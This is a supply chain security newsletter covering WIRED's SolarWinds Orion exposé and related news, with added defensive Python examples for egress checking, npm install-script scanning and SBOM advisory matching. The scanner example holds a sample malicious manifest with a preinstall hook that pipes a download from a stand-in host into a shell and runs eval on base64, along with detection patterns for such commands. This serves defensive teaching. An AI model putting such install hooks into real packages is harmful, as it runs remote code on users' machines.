Three Key Takeaways from WIRED’s SolarWinds Exposé

Welcome to the latest edition of Chainmail: Software Supply Chain Security News, which brings you the newest headlines from both the world and our team on all things software security. This week: Three key takeaways from WIRED’s exposé on the DOJ’s early detection of the SolarWinds Orion breach. Also: Researcher hijacks popular packages to get a job. 

This Week’s Top Story

Three Key Takeaways from WIRED’s SolarWinds Exposé

WIRED blew the SolarWinds supply chain hacking story open (again). Reporter Kim Zetter’s exposé was the product of months of interviews and research on the origins of the hack of SolarWinds’ Orion product. 

The Orion hack, which first came to light in the closing months of 2020, was the single biggest cybersecurity incident in recent memory. Hundreds of public- and private-sector organizations were hacked after downloading a signed software update from SolarWinds containing a malicious backdoor. While much has been reported about the SolarWinds hack in the last two years, Zetter was able to expose a number of as-yet-unreported details of the months leading up to the revelation of the SolarWinds hack. Here are a few of the most important takeaways: 

  • There were red flags - lots of them. Perhaps the most significant finding in Zetter’s reporting is that one of the most significant victims of the SolarWinds hack, the U.S. Department of Justice, had an early indication that it had been breached - some six months before the SolarWinds supply chain compromise was identified. DOJ security staff noticed suspicious traffic patterns emanating from a system running a test version of the Orion software in mid-2020. Zetter’s investigation uncovered communications between the DOJ and SolarWinds between May and July 2020 regarding the suspicious traffic. Those conversations led to the case being deemed insignificant by the DOJ. In August 2020, the DOJ purchased the Orion system, which sources say suggests that the DOJ was “satisfied” that there was no further threat posed by the Orion software. 
  • Many other security firms also stumbled across the hack. The DOJ wasn’t alone. Zetter’s story recounts similar experiences by cybersecurity pros working for private firms that also found evidence of the SolarWinds compromise, but failed to connect the dots to the Orion software. One key source for her story is Steven Adair, the CEO of Volexity, who describes coming across evidence that Russian hackers had compromised the environment of a Washington, D.C. think tank early in 2020. Despite numerous efforts to eject them, the hackers kept returning. Adair and his team zeroed in on one of the think tank’s servers, a machine running the SolarWinds Orion software, as the attackers’ avenue onto the think tank’s network. They took the compromised server offline, but were never able to identify the method the actors used to compromise the system. 
  • RTFM! Lax configuration played a part in the hack. The Sunburst malicious code only worked on systems that had Internet access. The recommended deployment guidelines said that the Orion servers should only have communicated with SolarWinds infrastructure. But in fact, around 20% to 30% of Orion deployments using the compromised version of the software were Internet connected. Victims including Mandiant and Microsoft had not restricted their Orion servers’ outbound traffic in this way. The Department of Homeland Security and other government agencies didn’t even put them behind firewalls, Zetter reported, citing Chris Krebs, who at the time of the intrusions was in charge of CISA. Brown, SolarWinds’ security chief, notes that the hackers likely knew in advance whose servers were misconfigured. 
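The last two takeaways describe the same control from two sides: the DOJ saw suspicious traffic leaving an Orion test server, and the deployment guidance said such a server should only ever talk to the vendor. The script below is an added example, not code from WIRED, SolarWinds or any of the firms named above; it shows how a defender can turn that guidance into a check over flow or proxy records for a management server. The vendor hostnames, the RFC 1918 heuristic for "internal", and every flow record are constructed for illustration.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# RFC 1918 ranges only. ipaddress's is_private also treats the documentation
# ranges (192.0.2.0/24 etc.) as private, which would hide the sample external
# addresses used below.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Hypothetical vendor endpoints a monitoring server is permitted to reach.
# These are placeholders, not real SolarWinds hostnames.
VENDOR_ALLOWLIST = {"updates.vendor.example", "licensing.vendor.example"}


@dataclass(frozen=True)
class Flow:
    src: str                        # management / monitoring server
    dst: str                        # destination IP
    dst_port: int
    dst_name: Optional[str] = None  # hostname from proxy or DNS logs, if known


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def unexpected_egress(flows: Iterable[Flow],
                      allowlist: Set[str] = VENDOR_ALLOWLIST) -> List[Flow]:
    """Flows that leave the internal network for a destination that is not an
    allowlisted vendor endpoint. Polling of internal devices is expected and skipped."""
    findings = []
    for f in flows:
        if is_internal(f.dst):
            continue
        if f.dst_name is not None and f.dst_name in allowlist:
            continue
        findings.append(f)
    return findings


def exposed_management_hosts(flows: Iterable[Flow]) -> Set[str]:
    """Management servers with at least one non-allowlisted Internet destination."""
    return {f.src for f in unexpected_egress(flows)}


def exposure_ratio(flows: List[Flow]) -> float:
    """Share of management servers that are effectively Internet-connected;
    the article puts the real-world figure for Orion at roughly 20% to 30%."""
    hosts = {f.src for f in flows}
    return len(exposed_management_hosts(flows)) / len(hosts) if hosts else 0.0


# Constructed sample: two monitoring servers, one compliant with the guidance and one not.
SAMPLE_FLOWS = [
    Flow("10.0.5.20", "10.0.7.11", 161),                               # SNMP poll, internal
    Flow("10.0.5.20", "203.0.113.10", 443, "updates.vendor.example"),  # allowed vendor endpoint
    Flow("10.0.5.20", "198.51.100.77", 443, "cdn-update.example"),     # external, not allowlisted
    Flow("10.0.5.20", "192.0.2.44", 80),                               # external, no hostname known
    Flow("10.0.5.21", "10.0.7.12", 161),                               # compliant server
    Flow("10.0.5.21", "203.0.113.10", 443, "licensing.vendor.example"),
]

if __name__ == "__main__":
    for f in unexpected_egress(SAMPLE_FLOWS):
        print(f"ALERT {f.src} -> {f.dst}:{f.dst_port} ({f.dst_name or 'unknown host'})")
    print(f"exposed management hosts: {exposure_ratio(SAMPLE_FLOWS):.0%}")
```

The check is deliberately destination-centric: a monitoring server has a small, knowable set of legitimate external peers, so anything outside that set is worth a ticket regardless of what the traffic looks like. The same allowlist is what a firewall egress rule for that host would encode.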

News Roundup

Here are the stories we’re paying attention to…

Researcher hijacks popular Packagist PHP packages to get a job

A researcher hijacked over a dozen Packagist packages—with some having been installed hundreds of millions of times over the course of their lifetime. The researcher with the pseudonym 'neskafe3v1' reached out to BleepingComputer stating that by hijacking these packages he hopes to get a job. And, he seems pretty confident that this would work. (BleepingComputer)

Unpaid open source maintainers struggle with increased security demands

Sixty percent of open source maintainers consider themselves to be unpaid hobbyists, according to a new study. With concerns about the security of the software supply chain paramount, this situation looks dangerous for organizations that depend on open source code.

The study by Tidelift, released Tuesday, showed that 77% of unpaid maintainers would like to be paid for their work. (The New Stack)

KEKW malware infects open-source Python Wheel files via a PyPI distribution

Malicious open-source Python .whl (Wheel) files were found distributing a new malware named KEKW that can steal sensitive information from infected systems, combining clipper functionality with an infostealer to hijack cryptocurrency transactions.

In a blog post on May 3, Cyble Research and Intelligence Labs (CRIL) explained that the Python packages under scrutiny were not present in the actual PyPI (Python Package Index) repository, indicating that the Python security team removed the malicious packages. (SC Media)

CISA releases draft self attestation form for comment (PDF)

This self-attestation form identifies the minimum secure software development requirements a software producer must meet, and attest to meeting, before their software subject to the requirements of M-22-18 may be used by Federal agencies. This form is used by software producers to attest that the software they produce was developed in conformity with specified secure software development practices. (CISA.gov)

GitGuardian’s Honeytoken aims to detect intruders in the software supply chain

If an attacker succeeds in gaining access to your code, Fourrier said, they can move laterally and take control of your databases in any of your cloud or other infrastructure resources. The goal of the Honeytoken module is to secure the software supply chain. “We have seen with different attacks [where an attacker] can hijack a production session from an engineer to get access to source code’’ from a third-party supply chain provider, Fourrier said. (SC Media)

eBook: Securing the government’s software supply chain

The government is grappling with the mechanics of addressing whether their software supply chain is secure. Download our new ebook to get a snapshot from leaders at CISA, the IT Industry Council and DoD’s National Counterintelligence and Security Center into current efforts. (Federal News Network)

Has the Altruism Model of Open Source Security Peaked?

OSS projects will always have a place in software. They are a great learning environment for those just entering their coding career or for those who want to brush up on their skills or gain experience. But as awareness of open source’s weaknesses broadens, will contributors shy away from trying to fix vulnerable or malicious code? It’s a question without a solid answer now, but it is likely that we have hit the peak of what the open source community was and are now shifting into a new era. (Security Boulevard)

Tightening Security in the Production Process by Shifting Left

Requiring developers also to be security experts who encountered the above challenges is, in most instances, an unrealistic expectation. An organization’s best option is to adopt tools and technologies that are secure by default and have security experts as part of the platform team who can understand the security structure and build guardrails and apply security best practices to that platform. (Spiceworks)

Anatomy of a Malicious Package Attack

As malicious packages are still a relatively young attack technique, the methods attackers rely on are likewise unsophisticated. Attackers using malicious packages tend to rely on four common techniques: pre- and post-install scripts, basic evasion techniques, shell commands, and basic network communication techniques. In the case of network communication, malicious packages use basic methods to deploy, execute, and communicate on the machine. That's good news for defenders, since even if the package is successfully downloaded, it remains relatively easy to detect while deployed. (Dark Reading)
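Three of the four techniques listed above (install scripts, shell commands, network communication) are visible in a package manifest before anything runs. The scanner below is an added example, not code from Dark Reading or any vendor; it reads an npm package.json, lists the lifecycle hooks that execute automatically on install, and tags each command with the technique families it exhibits. The indicator patterns, the hook list and both sample manifests are constructed for illustration.

```python
import json
import re
from typing import Dict, List

# npm lifecycle hooks that run without the user asking when a package is installed
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicator patterns, grouped by the technique families named in the article
INDICATORS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b"), "network download"),
    (re.compile(r"https?://"), "hard-coded URL"),
    (re.compile(r"\|\s*(sh|bash|zsh)\b"), "piped to shell"),
    (re.compile(r"\b(sh|bash|cmd|powershell)\s+(-c|/c|-enc)\b"), "shell command string"),
    (re.compile(r"\bbase64\b|\\x[0-9a-fA-F]{2}"), "encoding / obfuscation"),
    (re.compile(r"\beval\b|new Function\(|\bnode\s+-e\b"), "dynamic evaluation"),
]


def scan_install_scripts(package_json_text: str) -> List[Dict]:
    """Return one finding per lifecycle hook present in the manifest, with the
    indicator labels its command matched (an empty list means a hook exists but
    looks ordinary and only needs a human glance)."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [label for pattern, label in INDICATORS if pattern.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "reasons": reasons})
    return findings


def risky_hooks(package_json_text: str) -> List[Dict]:
    """Only the hooks that matched at least one indicator."""
    return [f for f in scan_install_scripts(package_json_text) if f["reasons"]]


# Constructed sample manifests (not real packages)
BENIGN = json.dumps({
    "name": "example-lib",
    "version": "1.0.0",
    "scripts": {
        "build": "tsc",
        "test": "jest",
        "postinstall": "node scripts/postinstall.js",
    },
})

SUSPICIOUS = json.dumps({
    "name": "example-lib-typo",
    "version": "1.0.1",
    "scripts": {
        "preinstall": "curl -s http://example.invalid/p.sh | sh",
        "postinstall": "node -e \"eval(Buffer.from('PLACEHOLDER','base64').toString())\"",
    },
})

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        for f in scan_install_scripts(manifest):
            print(f"[{label}] {f['hook']}: {f['command']!r} -> {f['reasons'] or 'no indicators'}")
```

Pattern matching of this kind is a triage aid, not a verdict: a legitimate native module may well download a prebuilt binary in a postinstall step. The useful output is the short list of hooks that deserve a read before the package is allowed into a build, which is exactly the window the article says defenders still have.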

What is a software bill of materials (SBOM)? And will it secure supply chains?

As a potential remedy, a tool called a software bill of materials (SBOM) has emerged as a key building block in software security and software supply-chain risk management. An SBOM is a nested inventory, a list of ingredients that make up software components. SBOM development has been in process since 2018 as a collaborative community effort, driven by the National Telecommunications and Information Administration’s (NTIA) multistakeholder process. (SDXCentral.com)
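The phrase "nested inventory" is the part of the definition that matters operationally: a component in an SBOM can itself carry components, so a risky library two levels down is only found if the consumer walks the whole tree. The code below is an added example, not from SDXCentral or any SBOM tool; it walks a CycloneDX-style JSON document recursively and matches every component's purl against an advisory map. The SBOM, the package names and the advisory entry are all constructed placeholders.

```python
import json
from typing import Dict, Iterator, List, Tuple

# Constructed CycloneDX-style SBOM. Names, versions and purls are made up;
# the nested "components" list under example-web is what the walk must not miss.
SAMPLE_BOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "metadata": {"component": {"type": "application",
                               "name": "example-service", "version": "3.2.0"}},
    "components": [
        {"type": "library", "name": "example-web", "version": "2.1.0",
         "purl": "pkg:npm/example-web@2.1.0",
         "components": [
             {"type": "library", "name": "example-http", "version": "1.4.2",
              "purl": "pkg:npm/example-http@1.4.2"},
             {"type": "library", "name": "example-parser", "version": "0.9.1",
              "purl": "pkg:npm/example-parser@0.9.1"},
         ]},
        {"type": "library", "name": "example-logging", "version": "5.0.0",
         "purl": "pkg:npm/example-logging@5.0.0"},
    ],
})

# Constructed advisory map keyed by purl (placeholder identifier, not a real advisory)
SAMPLE_ADVISORIES = {
    "pkg:npm/example-parser@0.9.1": "PLACEHOLDER-ADVISORY-1 (constructed)",
}


def iter_components(components: List[Dict], depth: int = 0) -> Iterator[Tuple[int, Dict]]:
    """Depth-first walk over components, descending into each component's own
    'components' list so transitive entries are visited too."""
    for c in components:
        yield depth, c
        yield from iter_components(c.get("components", []), depth + 1)


def flatten(bom_text: str) -> List[Tuple[int, str, str, str]]:
    """Flat (depth, name, version, purl) rows for every component in the SBOM."""
    bom = json.loads(bom_text)
    return [(depth, c["name"], c.get("version"), c.get("purl"))
            for depth, c in iter_components(bom.get("components", []))]


def match_advisories(bom_text: str, advisories: Dict[str, str]) -> Dict[str, str]:
    """Components whose purl appears in the advisory map, at any nesting depth."""
    bom = json.loads(bom_text)
    hits = {}
    for _, c in iter_components(bom.get("components", [])):
        purl = c.get("purl")
        if purl in advisories:
            hits[purl] = advisories[purl]
    return hits


if __name__ == "__main__":
    for depth, name, version, purl in flatten(SAMPLE_BOM):
        print(f"{'  ' * depth}{name}@{version}  ({purl})")
    for purl, advisory in match_advisories(SAMPLE_BOM, SAMPLE_ADVISORIES).items():
        print(f"MATCH {purl}: {advisory}")
```

Matching on the purl rather than on the bare name is the design choice worth copying: it ties the advisory to a specific ecosystem and version, which is what lets an SBOM consumer answer "are we shipping this?" without a fresh dependency resolution.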


Resource Roundup

Software Package Deconstruction: Analyzing the 3CX Software Package

In each episode of our new application security series, we will deconstruct, analyze, and expose hidden risks inside some of the largest and most complex software packages. In next week’s episode, we zero in on the 3CX software package and the recent supply chain attack.

Register now to watch on May 11

ReversingGlass: Supply Chain Risks in Art and Life… Even ‘The Simpsons’

In this episode of ReversingGlass: Key Concepts Explained, Matt touches on real-life software supply chain security cases such as the recent 3CX hack, and how popular media from past and present both imitates and forewarns this kind of threat.

ConversingLabs: The Rise of Malware Within the Software Supply Chain

In this special edition episode of our podcast, ConversingLabs, we chat with ReversingLabs Director of Product Management Charlie Jones on the sidelines of the RSA Conference 2023 in San Francisco. Charlie speaks with Paul about his RSAC track session: The Rise of Malware Within the Software Supply Chain.
